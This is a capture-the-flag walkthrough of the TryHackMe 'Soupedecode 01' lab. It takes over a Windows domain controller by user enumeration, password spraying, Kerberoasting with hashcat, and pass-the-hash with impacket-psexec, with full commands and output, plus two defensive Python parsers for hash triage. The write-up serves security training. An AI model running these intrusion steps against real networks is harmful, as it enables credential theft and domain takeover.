TryHackMe - Soupedecode 01
Introduction
Test your AD enumeration skills.
OS: Windows
URL: Soupedecode 01
Level: Easy
A simple Active Directory room to test your enumeration skills.
Description
Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.
Recon
Run a full nmap port scan to find all open ports.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ sudo nmap --min-rate=10000 -vv $IP -p-
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 124
88/tcp open kerberos-sec syn-ack ttl 124
135/tcp open msrpc syn-ack ttl 124
139/tcp open netbios-ssn syn-ack ttl 124
389/tcp open ldap syn-ack ttl 124
445/tcp open microsoft-ds syn-ack ttl 124
464/tcp open kpasswd5 syn-ack ttl 124
593/tcp open http-rpc-epmap syn-ack ttl 124
636/tcp open ldapssl syn-ack ttl 124
3268/tcp open globalcatLDAP syn-ack ttl 124
3269/tcp open globalcatLDAPssl syn-ack ttl 124
3389/tcp open ms-wbt-server syn-ack ttl 124
9389/tcp open adws syn-ack ttl 124
49664/tcp open unknown syn-ack ttl 124
49667/tcp open unknown syn-ack ttl 124
49673/tcp open unknown syn-ack ttl 124
49707/tcp open unknown syn-ack ttl 124
Many ports associated with Active Directory are open, including 88/tcp (Kerberos), 135/tcp (MSRPC), 139/tcp (NetBIOS), 389/tcp (LDAP), 445/tcp (SMB), and 3389/tcp (RDP).
Exploitation
Shell as ybob317
Since this is not an assumed-breach scenario, we need to find some form of initial access.
First, check whether null sessions or guest authentication are allowed on LDAP and SMB.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u '' -p ''
LDAP 10.201.69.28 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.69.28 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.201.69.28 389 DC01 [+] SOUPEDECODE.LOCAL\:
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u 'guest' -p ''
LDAP 10.201.69.28 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.69.28 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.201.69.28 389 DC01 [+] SOUPEDECODE.LOCAL\guest:
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u '' -p '' --shares
SMB 10.201.69.28 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.69.28 445 DC01 [-] SOUPEDECODE.LOCAL\: STATUS_ACCESS_DENIED
SMB 10.201.69.28 445 DC01 [-] Error enumerating shares: Error occurs while reading from remote(104)
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --shares
SMB 10.201.69.28 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.69.28 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 10.201.69.28 445 DC01 [*] Enumerated shares
SMB 10.201.69.28 445 DC01 Share Permissions Remark
SMB 10.201.69.28 445 DC01 ----- ----------- ------
SMB 10.201.69.28 445 DC01 ADMIN$ Remote Admin
SMB 10.201.69.28 445 DC01 backup
SMB 10.201.69.28 445 DC01 C$ Default share
SMB 10.201.69.28 445 DC01 IPC$ READ Remote IPC
SMB 10.201.69.28 445 DC01 NETLOGON Logon server share
SMB 10.201.69.28 445 DC01 SYSVOL Logon server share
SMB 10.201.69.28 445 DC01 Users
Guest authentication works for SMB, but we don't have permission to read the shares. Take note of the backup and Users shares for later.
The guest account doesn't have the privileges to list all the domain users directly, but we can brute-force RIDs (--rid-brute) to enumerate users.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --rid-brute | grep -i sidtypeuser | awk '{print $6}' | cut -d\\ -f2 > userlist.txt
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ head -n 10 userlist.txt
Administrator
Guest
krbtgt
DC01$
bmark0
otara1
kleo2
eyara3
pquinn4
jharper5
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ wc -l userlist.txt
1069 userlist.txt
We have a list of 1069 users (which also includes computer accounts).
Now that we have a user list, let's check whether any of the accounts are vulnerable to an AS-REP Roasting attack.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/ -usersfile users.txt -outputfile asrep.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set
....
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
No hits. Next, let's check whether any account has its password set to its username (--no-bruteforce pairs each username only with the entry on the same line of the password file, so every account gets exactly one attempt).
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
LDAP 10.201.69.28 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.69.28 389 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Administrator
.....
LDAP 10.201.69.28 389 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
We have a hit! The user ybob317 has the password ybob317.
ybob317 cannot RDP, but has read access to the Users share, which we can use to read the flag.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u ybob317 -p ybob317 --shares
SMB 10.201.34.69 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.34.69 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB 10.201.34.69 445 DC01 [*] Enumerated shares
SMB 10.201.34.69 445 DC01 Share Permissions Remark
SMB 10.201.34.69 445 DC01 ----- ----------- ------
SMB 10.201.34.69 445 DC01 ADMIN$ Remote Admin
SMB 10.201.34.69 445 DC01 backup
SMB 10.201.34.69 445 DC01 C$ Default share
SMB 10.201.34.69 445 DC01 IPC$ READ Remote IPC
SMB 10.201.34.69 445 DC01 NETLOGON READ Logon server share
SMB 10.201.34.69 445 DC01 SYSVOL READ Logon server share
SMB 10.201.34.69 445 DC01 Users READ
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient ybob317:ybob317@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Users
# ls
drw-rw-rw- 0 Thu Jul 4 18:48:22 2024 .
drw-rw-rw- 0 Wed Jun 18 18:14:47 2025 ..
drw-rw-rw- 0 Thu Jul 4 18:49:01 2024 admin
drw-rw-rw- 0 Fri Jul 25 13:45:10 2025 Administrator
drw-rw-rw- 0 Sat Jun 15 23:49:29 2024 All Users
drw-rw-rw- 0 Sat Jun 15 22:51:08 2024 Default
drw-rw-rw- 0 Sat Jun 15 23:49:29 2024 Default User
-rw-rw-rw- 174 Sat Jun 15 23:46:32 2024 desktop.ini
drw-rw-rw- 0 Sat Jun 15 13:54:32 2024 Public
drw-rw-rw- 0 Mon Jun 17 13:24:32 2024 ybob317
#
# cat ybob317/desktop/user.txt
281**REDACTED**
Shell as file_svc
Now that we have valid domain creds, we can enumerate a lot more:
- AS-REP Roasting (in case you missed any domain users)
- Kerberoasting
- Pillaging shares for sensitive files or files containing credentials
- Collecting BloodHound data to see if our user has any interesting privileges
- Dumping the entire LDAP directory to look for user attributes that may contain credentials (description, notes, info, etc.)
- etc.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --kerberoast kerb.hash
LDAP 10.201.34.69 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.34.69 389 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP 10.201.34.69 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.201.34.69 389 DC01 [*] Total of records returned 5
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: file_svc, memberOf: [], pwdLastSet: 2024-06-17 13:32:23.726085, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: firewall_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:32.710125, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\firewall_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: backup_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:49.476511, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\backup_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: web_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:04.569417, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\web_svc*$[...SNIP...]
LDAP 10.201.34.69 389 DC01 [*] sAMAccountName: monitoring_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:18.511871, lastLogon: <never>
LDAP 10.201.34.69 389 DC01 $krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\monitoring_svc*$[...SNIP...]
We have a few service accounts that are vulnerable to Kerberoasting. Let's crack them.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ hashcat kerb.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
....
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]:Pass**REDACTED**
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: kerb.hash
Time.Started.....: Fri Aug 1 16:58:45 2025 (30 secs)
Time.Estimated...: Fri Aug 1 16:59:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4692.0 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/10 (20.00%) Digests (total), 2/10 (20.00%) Digests (new), 2/10 (20.00%) Salts
Progress.........: 143443850/143443850 (100.00%)
Rejected.........: 0/143443850 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:9 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 34%
Started: Fri Aug 1 16:58:42 2025
Stopped: Fri Aug 1 16:59:17 2025
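As an added triage helper (not from the writeup or from the tools used above), a Python parser for the $krb5tgs$ lines in kerb.hash that reports, per account, the ticket etype and whether it is an RC4 ticket. The sample lines reuse the account names and realm from the nxc output above but use constructed filler hex in place of the snipped checksum and ciphertext, plus one constructed AES (etype 18) line for contrast.

```python
"""Triage Kerberoast output (kerb.hash): which accounts were roasted, and with which etype."""
import re

# RC4-HMAC (etype 23) layout as written by nxc/impacket: $krb5tgs$23$*user$realm$spn*$checksum$edata
RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]*)\*\$([0-9a-f]{32})\$([0-9a-f]+)$", re.I)
# AES (etype 17/18) layout: $krb5tgs$18$user$realm$*spn*$checksum$edata; the *spn* part is
# optional because the hashcat wiki form omits it, and the checksum is 12 bytes, not 16.
AES_RE = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$(?:\*([^*]*)\*\$)?([0-9a-f]{24})\$([0-9a-f]+)$", re.I)
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

# Constructed sample: account names and realm come from the output above, but the checksum and
# edata are filler hex (the real ticket bytes were snipped), plus one AES ticket for contrast.
SAMPLE_HASHES = """\
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\\file_svc*$0011223344556677889900aabbccddee$aabbccdd
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\\web_svc*$ffeeddccbbaa99887766554433221100$01020304
$krb5tgs$18$backup_svc$SOUPEDECODE.LOCAL$*SOUPEDECODE.LOCAL\\backup_svc*$00112233445566778899aabb$99887766
not a hash line
"""


def parse_krb5tgs(line):
    """Parse one $krb5tgs$ line; return None if it is not a recognised TGS-REP hash."""
    line = line.strip()
    m = RC4_RE.match(line)
    if m:
        user, realm, spn, checksum, edata = m.groups()
        etype = 23
    else:
        m = AES_RE.match(line)
        if not m:
            return None
        et, user, realm, spn, checksum, edata = m.groups()
        etype = int(et)
    return {"user": user, "realm": realm, "spn": spn, "etype": etype,
            "hashcat_mode": HASHCAT_MODE[etype], "rc4": etype == 23,
            "edata_bytes": len(edata) // 2}


def triage(text):
    """Parse every line and list RC4 tickets first: an etype 23 ticket shows the SPN account
    still accepts RC4, and such tickets crack at plain wordlist speed (mode 13100 above)."""
    tickets = [t for t in (parse_krb5tgs(l) for l in text.splitlines()) if t]
    tickets.sort(key=lambda t: (not t["rc4"], t["user"]))
    return tickets
```

Only RC4 tickets crack at the speed hashcat showed above; on the domain side, restricting service accounts to AES (msDS-SupportedEncryptionTypes) and giving them gMSA or long random passwords is what makes the roast impractical.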
Shell as System
We got the creds for the file_svc user, so we restart our enumeration process, checking for any new file shares we might now have access to.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u file_svc -p 'Pass**REDACTED**' --shares
SMB 10.201.34.69 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.34.69 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Pass**REDACTED**
SMB 10.201.34.69 445 DC01 [*] Enumerated shares
SMB 10.201.34.69 445 DC01 Share Permissions Remark
SMB 10.201.34.69 445 DC01 ----- ----------- ------
SMB 10.201.34.69 445 DC01 ADMIN$ Remote Admin
SMB 10.201.34.69 445 DC01 backup READ
SMB 10.201.34.69 445 DC01 C$ Default share
SMB 10.201.34.69 445 DC01 IPC$ READ Remote IPC
SMB 10.201.34.69 445 DC01 NETLOGON READ Logon server share
SMB 10.201.34.69 445 DC01 SYSVOL READ Logon server share
SMB 10.201.34.69 445 DC01 Users
We have read access to the backup share. Let's see if we can find any sensitive files.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient file_svc:'Pass**REDACTED**'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use backup
# ls
drw-rw-rw- 0 Mon Jun 17 13:41:17 2024 .
drw-rw-rw- 0 Fri Jul 25 13:51:20 2025 ..
-rw-rw-rw- 892 Mon Jun 17 13:41:23 2024 backup_extract.txt
# get backup_extract.txt
# exit
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d**REDACTED**:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
We get a file named backup_extract.txt which appears to contain a hashdump of machine accounts. Let's check whether any of these creds are still valid.
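As an added example (not part of the original writeup), a small Python parser for this pwdump-style format (user:RID:LM hash:NT hash:::) that produces the same user and hash lists the cut commands below build, and also reports what a defender wants from such a dump: whether any LM hashes are still stored, and which accounts share an NT hash. The sample input is the file's own non-redacted lines.

```python
"""Parse a pwdump-style hash dump (user:RID:LM:NT:::) and audit it for weak spots."""
import re
from collections import defaultdict

# LM hash of an empty password; seeing it means LM hashing is disabled (expected on modern AD).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Copied from the backup_extract.txt shown above; the redacted FileServer$ line is left out.
SAMPLE_DUMP = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
"""


def parse_pwdump(text):
    """Return one dict per well-formed line; malformed lines (e.g. a redacted hash) are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
                        "machine": user.endswith("$")})
    return entries


def audit(entries):
    """Findings a defender cares about: LM hashes still stored, and NT hashes shared by
    several accounts (identical NT hash means identical password)."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "lm_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_nt": {nt: users for nt, users in by_nt.items() if len(users) > 1},
    }


def user_and_hash_lists(entries):
    """The parallel username / NT-hash lists that the two cut(1) commands below produce."""
    return [e["user"] for e in entries], [e["nt"] for e in entries]
```

Running audit(parse_pwdump(SAMPLE_DUMP)) shows two pairs of machine accounts with identical NT hashes (MailServer$/BackupServer$ and CitrixServer$/MonitoringServer$), i.e. shared passwords, which is a finding in its own right.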
# generate a user and hash file list so it's easier to use with nxc
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f1 > backup_users.txt
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f4 > backup_hashes.txt
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u backup_users.txt -H backup_hashes.txt --no-brute
SMB 10.201.34.69 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.34.69 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.201.34.69 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 10.201.34.69 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 10.201.34.69 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da**REDACTED** (Pwn3d!)
We have valid creds for the FileServer$ machine account, and the (Pwn3d!) marker indicates that we have admin access to the machine. Let's use impacket-psexec to get a shell as SYSTEM and read the root flag.
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-psexec 'FileServer$'@$IP -hashes :e41da7e79a**REDACTED**
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.201.34.69.....
[*] Found writable share ADMIN$
[*] Uploading file lSJpbWWT.exe
[*] Opening SVCManager on 10.201.34.69.....
[*] Creating service RntB on 10.201.34.69.....
[*] Starting service RntB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
**REDACTED**
It looks like the FileServer$ machine account was added to the Enterprise Admins group, which is what allowed us to use psexec to get a shell as SYSTEM. An LDAP query for the account confirms it:
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --query '(&(objectclass=user)(sAMAccountName=FileServer$))' ""
LDAP 10.201.34.69 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.201.34.69 389 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP 10.201.34.69 389 DC01 [+] Response for object: CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP 10.201.34.69 389 DC01 objectClass top
LDAP 10.201.34.69 389 DC01 person
LDAP 10.201.34.69 389 DC01 organizationalPerson
LDAP 10.201.34.69 389 DC01 user
LDAP 10.201.34.69 389 DC01 computer
LDAP 10.201.34.69 389 DC01 cn FileServer
LDAP 10.201.34.69 389 DC01 distinguishedName CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP 10.201.34.69 389 DC01 instanceType 4
LDAP 10.201.34.69 389 DC01 whenCreated 20240615200611.0Z
LDAP 10.201.34.69 389 DC01 whenChanged 20250801211100.0Z
LDAP 10.201.34.69 389 DC01 uSNCreated 22204
LDAP 10.201.34.69 389 DC01 memberOf CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL